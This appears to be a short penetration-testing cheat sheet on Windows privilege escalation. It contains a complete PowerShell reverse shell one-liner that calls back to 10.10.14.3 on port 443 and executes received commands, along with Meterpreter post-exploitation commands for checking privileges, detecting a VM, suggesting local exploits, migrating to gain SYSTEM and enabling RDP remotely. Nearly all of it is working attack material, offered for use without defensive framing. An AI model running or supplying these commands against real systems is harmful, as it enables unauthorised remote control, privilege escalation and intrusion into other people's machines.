Windows Priv Escalate

FuzzySecurity's Windows Privilege Escalation Fundamentals: https://www.fuzzysecurity.com/tutorials/16.html

Powershell Reverse Shell

Create and run shell.ps1 on host
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Metasploit

Get system information
getuid
sysinfo
pwd
ps #try to use migrate to spool to get NT Authority
Figure out about current user
getprivs #Get privileges of current user
Check if you are on a VM
run post/windows/gather/checkvm
Run exploit suggester
run post/multi/recon/local_exploit_suggester
Remotely enable RDP
run post/windows/manage/enable_rdp